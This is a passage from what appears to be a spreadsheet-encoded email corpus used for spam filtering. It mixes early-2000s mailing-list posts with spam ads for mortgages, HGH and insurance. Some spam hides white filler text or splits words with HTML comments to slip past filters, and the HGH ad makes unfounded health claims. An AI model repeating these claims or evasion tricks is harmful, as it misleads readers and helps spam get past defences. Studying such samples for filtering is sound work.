 &gt; neurological pleasure from cooperating with it than we would if it 
 &gt; were humanized? Or ...?
 &gt;
 &gt;  
 &gt;
 Well, IMNHO, its because companies do not reward knowledge sharers. When 
 time comes for evaluation, there isn't a line on the page saying "Helped 
 others to succeed with their projects." Sharing inevitably cuts into the 
 time for personal productive work, and generally shows up as a red flag 
 if your boss has a "management by exception"(1) style.
 Owen
 1. http://www.xrefer.com/entry/164669
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Mirror a website
</t>
  </si>
  <si>
    <t xml:space="preserve">You could try HTTrack, available here: http://www.httrack.com/index.php
 It does recursive grabs of stuff, gets pictures etc.
 Hello everyone, by the way.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] www.spamassassin.org: giving a HTTP/1.1 error from
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm getting an error page from sourceforge.net when I try to go to
 www.spamassassin.org. 
 Just FYI. 
 -- 
 Larry Rosenman                     http://www.lerctr.org/~ler
 Phone: +1 972-414-9812                 E-Mail: ler@lerctr.org
 US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749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</si>
  <si>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 You're -Approved-!
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00D7_08E60D5B.E5437E70
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQo8Ym9keT4NCjxmb250IGNvbG9yPSJmZmZmZmYiPmRyeXdhbGw8
 L2ZvbnQ+DQo8cD5Zb3VyIGhvbWUgcmVmaW5hbmNlIGxvYW4gaXMgYXBwcm92
 ZWQhPGJyPjwvcD48YnI+DQo8cD5UbyBnZXQgeW91ciBhcHByb3ZlZCBhbW91
 bnQgPGEgaHJlZj0iaHR0cDovL3d3dy5tb3J0Z2FnZXBvd2VyMy5jb20vIj5n
 bw0KaGVyZTwvYT4uPC9wPg0KPGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJy
 Pjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+
 PGJyPg0KPHA+VG8gYmUgZXhjbHVkZWQgZnJvbSBmdXJ0aGVyIG5vdGljZXMg
 PGEgaHJlZj0iaHR0cDovL3d3dy5tb3J0Z2FnZXBvd2VyMy5jb20vcmVtb3Zl
 Lmh0bWwiPmdvDQpoZXJlPC9hPi48L3A+DQo8Zm9udCBjb2xvcj0iZmZmZmZm
 Ij5kcnl3YWxsPC9mb250Pg0KPC9ib2R5Pg0KPGZvbnQgY29sb3I9ImZmZmZm
 ZiI+MWdhdGUNCjwvaHRtbD4NCjUyOTdnZHFLNi00OThqeXhsMzAzM1JhZkQz
 LTE5NVJUY3o2NDg1b2JRVTktNjE1TE9MZzlsNDk=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: First direct estimate of hidden vCJD cases
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8062538,1440/
 Date: Not supplied
 Tests for the infectious agent in people without symptoms do not reduce the 
 deaths predicted - larger studies are "urgently needed"
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Gotta wonder what the GPG config stuff in ~/.exmh/exmh-defaults looks 
 like.  Also gotta wonder what the message headers in the offending 
 message are saying to nmh/exmh.  My set-up works perfectly.  That is, 
 I get a pop-up window to enter my passphrase into, and when I type it 
 correctly, the message display changes from a prompt to click to 
 decrypt to the message content.
 TTFN....
 On 11 September 2002 at 12:17, Brent Welch &lt;welch@panasas.com&gt; wrote:
 Hmm - I'm cc'ing the exmh-workers list, because I really don't know
 much about the various PGP interfaces.  I think there has been some
 talk about "issues" with the latest version of gpg.
 &gt;&gt;&gt;Hacksaw said:
  &gt; version 2.5 08/15/2002
  &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31
  &gt; EDT 2001 i686 unknown
  &gt; Tk 8.3 Tcl 8.3
  &gt; 
  &gt; It's not clear to me this is a bug with exmh per se, but it's
  &gt; something that manifests through exmh, so I figured asking you
  &gt; might help me track it down.
  &gt;
  &gt; When I receive a gpg encrypted message, and it asks me for a
  &gt; passphrase, it first tries to ask me via the tty under which
  &gt; exmh is running. It tells me my passphrase is incorrect every
  &gt; time, at which point exmh offers me the line in the message
  &gt; about decrypting. I click the line and it offers me the dialog
  &gt; box, and tells me the passphrase is correct, and shows me the
  &gt; decrypted message.
  &gt; 
  &gt; Any ideas on that?
  &gt; -- 
  &gt; Honour necessity.
  &gt; http://www.hacksaw.org -- http://www.privatecircus.com -- KB1FVD
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HGH Liquid!  Lose Weight...Gain Muscle...Affordable Youth!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;Hello, jm@neteze.com&lt;BR&gt;&lt;BR&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Human Growth Hormone Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lose weight while building lean muscle mass&lt;br&gt;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;Remarkable discoveries about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;) &lt;br&gt;are changing the way we think about aging and weight loss.&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;&lt;td height="2" width="247"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Lose Weight&lt;br&gt;Build Muscle Tone&lt;br&gt;Reverse Aging&lt;br&gt;
 Increased Libido&lt;br&gt;Duration Of Penile Erection&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height="2" width="222"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Healthier Bones&lt;br&gt;
 Improved Memory&lt;br&gt;Improved skin&lt;br&gt;New Hair Growth&lt;br&gt;Wrinkle Disappearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;&lt;p align="center"&gt;&lt;a href="http://211.99.37.206:81/ultimatehgh_run/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;Visit 
 Our Web Site and Learn The Facts: Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;&lt;div align="center"&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;BR&gt;You are receiving this email as a subscr&lt;!----&gt;iber&lt;br&gt;to the Opt&lt;!----&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!----&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;just &lt;a href="http://211.99.37.206:81/ultimatehgh_run/remove.php?userid=jm@neteze.com"&gt;Click Here&lt;/a&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.
 Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; My main concern is that when rebuilding the recent packages I've made
 &gt; for Psyche on Valhalla, I'd need to lower the "Release:" tag (to keep an
 &gt; upgrade working), and that would f*ck up my CVS repository which is on
 &gt; my Valhalla box
 Sorry, I don't get it. What's wrong with a release tag of fr1?
 -- 
 Do I look like a freakin' people person?
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Optimising for PentiumMMX?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 21, 2002 at 07:06:06PM +0100, John Gay wrote:
 &gt; I am wondering if the C, and other libraries  should be re-built? Can they 
 &gt; take advantage of the Pentium and MMX instructions for system performance? 
 &gt; And would this require re-building gcc as well?
 glibc is a likely candidate.
 &gt; On a related note, I know I've mentioned here before, but I'm still looking 
 &gt; for a Slot 1 550Mhz PIII. My regular system is a Dual PII350 and the 440BX 
 &gt; M/B can take PIII's. I managed to get my hands on one. If I could get another 
 &gt; I could put the two PIII's into this box and re-compile X to use the 
 &gt; SSE/Katmai instructions in the PIII. I just don't thing it is worth replacing 
 &gt; two PII's with one PIII. I know that they are out-of-stock, and I do watch 
 &gt; the Buy-N-Sell regularly, but short of buying a full PIII system, I've not 
 &gt; had much luck.
 Keep an eye on eBay.  One annoyance of eBay is that many sellers state "will
 ship to US only".  However, I've found that if you ask nicely, they will
 usually ship over here.  For payments, either setup a paypal account or
 post the seller a US dollar bank draft.  I've got lots of little bits and
 pieces that way (for example, finally got my hands on a rackmount kit for
 my DECserver 700 terminal server which I'd been looking for for ages, for
 a total of US$15).
 Later,
 Kenn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: No Blackpool illumination from these control freaks
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418830,215/
 Date: 2002-10-01T04:33:54+01:00
 *Comment:* The suppression of debate shows Labour's leadership at its worst, 
 writes *Jonathan Freedland*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Lose 22.5lbs in 3 weeks!
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Lose 22.5lbs in 3 weeks!
 Flush Fat Away Forever! Free 30-Day Supply
 http://www.adclick.ws/p.cfm?o=423&amp;s=pk19
 2) Introducing Chase Platinum for Students
 With a 0% Introductory APR
 http://www.adclick.ws/p.cfm?o=421&amp;s=pk19
 3) Access Your PC From Anywhere - Download Now
 http://www.adclick.ws/p.cfm?o=425&amp;s=pk19
 Have a Wonderful day,
 PrizeMama
 ------------------
 You are receiving this email because you have opted-in to receive
 email from publisher: prizemama.  To unsubscribe, click below:
 http://u2.azoogle.com/?z=93-1090346-62lLC4
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 'Flipping' Goldman fingered
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535465,215/
 Date: 2002-10-04T02:39:00+01:00
 *Business:* Congressional report offers damaging summary of bank's dotcom boom 
 years.
</t>
  </si>
  <si>
    <t xml:space="preserve">Owen Byrne wrote:
 &gt; What a load of crap. Politics are somehow more muddy now?  I'd say that
 &gt; its considerably
 &gt; clearer - the vast majority of people feel disenfranchised, and the
 &gt; common practice of
 &gt; putting protestors in boxes is done usually to hide them from TV
 &gt; cameras, visiting dignitaries,
 &gt; etc, further exacerbating those feelings.
 &gt; "Unpeaceably disrupting political rallies" is now usually done by police
 &gt; with riot gear and pepper spray.
 &gt; 
 &gt; We had a good one here a month or so ago - a few people peaceably
 &gt; strayed from the permit area,
 &gt; which was nearly a mile from the site of the meeting of finance
 &gt; ministers held here (the motorcade drove
 &gt; by it for about 10 seconds), and were immediately gassed,  beaten and
 &gt; arrested. Not very muddied at all.
 What does that exactly have to do with the statement that
 distruption of peacable political assembly has become
 a common practice disruption tool?  It's an observation
 not a judgement, comment, approval.  You've focused on the
 word "muddy" to use it in a different context than the one
 I posted.
 Maybe the distinction I was trying to make was too subtle and
 I was trying to be too clever with my writing this morning.
 Let me summarize the important parts of my post for you: I
 have a premise that there is a difference between free and protected
 speech and action.  I think O'Neill on his soapbox doesn't
 understand the distinction.
 All better?  
 Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Well, for example ..
 &gt;&gt;&gt;&gt;&gt; "b" == bitbitch  &lt;bitbitch@magnesium.net&gt; writes:
     b&gt; Once we understand this [ the fantasy virus model ], many of
     b&gt; our current perplexities will find themselves
     b&gt; resolved. Pseudo-issues such as debates over the legitimacy of
     b&gt; racial profiling would disappear: Does anyone in his right
     b&gt; mind object to screening someone entering his country for signs
     b&gt; of plague? Or quarantining those who have contracted it? Or
     b&gt; closely monitoring precisely those populations within his
     b&gt; country that are most at risk?
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Sep 05, 2002 at 10:12:59PM -0400, Leland Woodbury wrote:
 &gt; I found a nice little Perl script for this purpose called rotate, which 
 &gt; makes the process of rotating log files very simple.  If there's an 
 &gt; official source for this script, I couldn't find it.  (My hosting 
 &gt; provider, pair.com, has it installed, and that's where I found it.) 
 &gt;  However, redistribution appears to be allowed, so I've attached it.
 Thanks for the script.  It also appears that the standard logrotate tools
 included with many systems (or at least RedHat systems) will support
 wildcards when rotating files so something like
 /home/*/.razor/razor-agent.log can be specified...
 -Dave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</si>
  <si>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Almost-Guaranteed Issue Term
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_223205_01C201AE.0A589530
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  "Turbojet Issue" Impaired Risk Term=09
  	 Only 8 Medical Questions=0A=
 Accept/Reject Underwriting=09
 Almost Guarantee Issue Term for Impaired Risk Market
 10 Year Level Term - 8 Medical Questions
 Issue Ages 20 to 55 - $10,000 to $75,000 Face Amount
 A+ Carrier
 You Won't Sleep Tonight Thinking About All The Prospects=20
 You Have For This Product!
 You Have Several Cases In Your Desk Drawer=20
 For This Product!
 Call or e-mail &lt;mailto:info@impairedriskterm.com&gt;  us today!
 Visit our web site www.impairedriskterm.com
 &lt;http://www.impairedriskterm.com&gt;  for rates=20
 and a sample application =09
  800-562-8019=09
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;=20
 ------=_NextPart_000_223205_01C201AE.0A589530
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Almost-Guaranteed Issue Term&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
   &lt;table width=3D"550" border=3D"2" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#000000" align=3D"center"&gt;
     &lt;tr&gt;
       &lt;td bordercolor=3D"#000000"&gt;=20
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td colspan=3D'2'&gt;&lt;img =
 src=3D"http://63.211.81.87/images/producers/header.jpg" width=3D"550" =
 height=3D"224" border=3D'0' alt=3D'"Turbojet Issue" Impaired Risk =
 Term'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/producers/bot.jpg" width=3D"353" =
 height=3D"139" border=3D'0'&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/producers/movie6.gif" width=3D"197" =
 height=3D"139" border=3D'0' alt=3D'Only 8 Medical =
 Questions&amp;#10;Accept/Reject Underwriting'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#000000" colspan=3D'2'&gt;=20
               &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"4" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;
                 Almost Guarantee Issue Term for Impaired Risk Market&lt;br&gt;
                 10 Year Level Term - 8 Medical Questions&lt;br&gt;
                 Issue Ages 20 to 55 - $10,000 to $75,000 Face Amount&lt;br&gt;
                 A+ Carrier&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td colspan=3D'2'&gt;=20
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" color=3D"#CC6600"&gt;&lt;b&gt;&lt;br&gt;
                 You Won't Sleep Tonight Thinking About All The Prospects =
 &lt;br&gt;
                 You Have For This Product!&lt;br&gt;&lt;br&gt;
                 You Have Several Cases In Your Desk Drawer &lt;br&gt;
                 For This Product!&lt;br&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td colspan=3D'2' align=3D"center"&gt;
               &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;
                Call  or &lt;a =
 href=3D"mailto:info@impairedriskterm.com"&gt;e-mail&lt;/a&gt; us today!&lt;br&gt;
                Visit our web site &lt;a =
 href=3D"http://www.impairedriskterm.com"&gt;www.impairedriskterm.com&lt;/a&gt; =
 for rates &lt;br&gt;
                and a sample application&lt;/font&gt;&lt;/b&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td colspan=3D'2' align=3D"center"&gt;&lt;br&gt;
               &lt;img =
 src=3D"http://63.211.81.87/images/producers/phone.jpg" width=3D"495" =
 height=3D"62" alt=3D'800-562-8019'&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%" bgcolor=3D"#993300"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr bgcolor=3D"#000000"&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font =
 color=3D"#FFFFFF"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;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value=3D"info@impairedriskterm.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"Simplified Issue inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"7" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;=20
               &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;
                 We don't want anybody to receive our mailing who does =
 not wish to=20
                 receive them. This is professional communication sent to =
 insurance=20
                 professionals. To be removed from this mailing list, DO =
 NOT REPLY=20
                 to this message. Instead, go here: &lt;a =
 href=3D"http://www.Insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_223205_01C201AE.0A589530--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Upgraded to Razor 2.14
</t>
  </si>
  <si>
    <t xml:space="preserve">I successfully made the leap to Razor 2.14.  I did have a bit of trouble
 with Digest::MD5 on Mandrake 8.1 and Mandrake 8.2.  On each platform, I had
 to reinstall the original version of Digest::MD5 over top of the Digest::MD5
 v2.20 that Razor-SDK installed.  Otherwise, Perl refused to compile a thing.
 I should have some effectiveness stats on Razor 2 in a few days.  We will
 see what % of our corporation's spam it detects.
 Fox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</si>
  <si>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Re[3]: Selling Wedded Bliss (was Re: Ouch...)
</t>
  </si>
  <si>
    <t xml:space="preserve">In addition, one bit of anecdotal evidence from a conversation in
 1984! in San Fransisco is hardly enough to extrapolate 500 to 3k.
 This is the only quote I could find relating to promiscuity in
 homosexual men.
 "I think people feel a certain invulnerability, especially young
 people, like this disease doesn't affect me. The publicity about the disease was very much the kind where it was easy to say, "That isn't me. I'm not promiscuous." Promiscuity, especially, was a piece where people could easily say, "Well, I'm not. Promiscuous is more than I do." If you have 300 partners a year, you can think you're not promiscuous if you know somebody who has 500. So it's all relative, and it was easy to feel that that isn't me."
 You could find hets who have the same kind of partner volume.  BFD.
 This kind of random generation of numbers that leads the nutty
 religious bigots (as you mentioned earlier).
 Grr.   Bits damnit.  Now, I must go brief.
 -BB
 EL&gt;&gt; On Sun, 8 Sep 2002, CDale wrote:
 &gt;&gt;&gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gays
 EL&gt;&gt; So how many of your hetero friends had &gt;3 k lovers?
 bmn&gt; So Eugen, how many of your homo friends have -had- 3k lovers?
 bmn&gt; In fact, thats a general question for FoRK proper.
 bmn&gt; Do you know anyone, outside of meybee Wilt Chamberlin and a few of the
 bmn&gt; gang-bang porn queens who -have- had even 1.5k lovers?
 bmn&gt; Eegads, if you're hypothesizing numbers like -that- Eugen, you at
 bmn&gt; least owe it to FoRK to back that shit up.
 bmn&gt; Otherwise we're liable to assume rampant unfounded homophobia and that
 bmn&gt; would just be a lose.
 bmn&gt; Just a quick assumption here.   I'm not a math geek or anything, but
 bmn&gt; assuming 1 lover every day, that would be like at least one lover
 bmn&gt; everyday for 8 years and some change.   I don't know about you, but
 bmn&gt; very very few of us are -that- lucky (or even close to that lucky)
 bmn&gt; and after awhile, even the sexaholics get bored and have to mingle
 bmn&gt; something new into their weekends.   You really are assumiing that the
 bmn&gt; homosexual population is a) that large in a given area (The meccas
 bmn&gt; might qualify, but try finding that kind of homosexual population in
 bmn&gt; say, Tulsa, Oklahoma or Manchester, NH (Tho Manchester does have quite
 bmn&gt; a few nifty gaybars, but thats a different story)  b) that bored/sex
 bmn&gt; obsessed/recreationally free to pursue sex that often, with that many
 bmn&gt; partners or that they'd even WANT that many partners.
 bmn&gt; Qualify yourself, or at least lower your outrageous numbers.
 bmn&gt; =BB
 &gt;&gt;&gt; are promiscuous, and so are hets, but I betcha gays are more
 &gt;&gt;&gt; AIDSphobic than hets, generally speaking....
 EL&gt;&gt; The virus load issue is orthogonal to the fact. Bzzt. Switch on your
 EL&gt;&gt; brain, you both. I was mentioning that a subpopulation outside of the sex
 EL&gt;&gt; industry is/used to be extremely promiscuous, about two orders of
 EL&gt;&gt; magnitude higher than average.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Got a Mortgage? 6.25 30 yr Fixed Free Instant Quote djf
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="539" border="0" style="border:12px double #006600; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="4" height="423"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-collapse: collapse" bordercolor="#111111"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#000000"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Dear 
               Homeowner,&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
 &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;
               *&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000"&gt;6.25% 
               30 Yr Fixed Rate Mortgage&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font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
             &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="504" border="0" style="position: relative; border-collapse: collapse" bordercolor="#111111" height="1"&gt;
           &lt;tr&gt;
             &lt;td vAlign="top" width="325" height="1"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;br&gt;
               &lt;/a&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=b32"&gt;Click Here for a Free Quote!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=A11"&gt;
               &lt;/a&gt;
             &lt;/div&gt;
             &lt;p&gt;&lt;b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Lock 
             In YOUR LOW FIXED RATE TODAY&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;dl&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;NO 
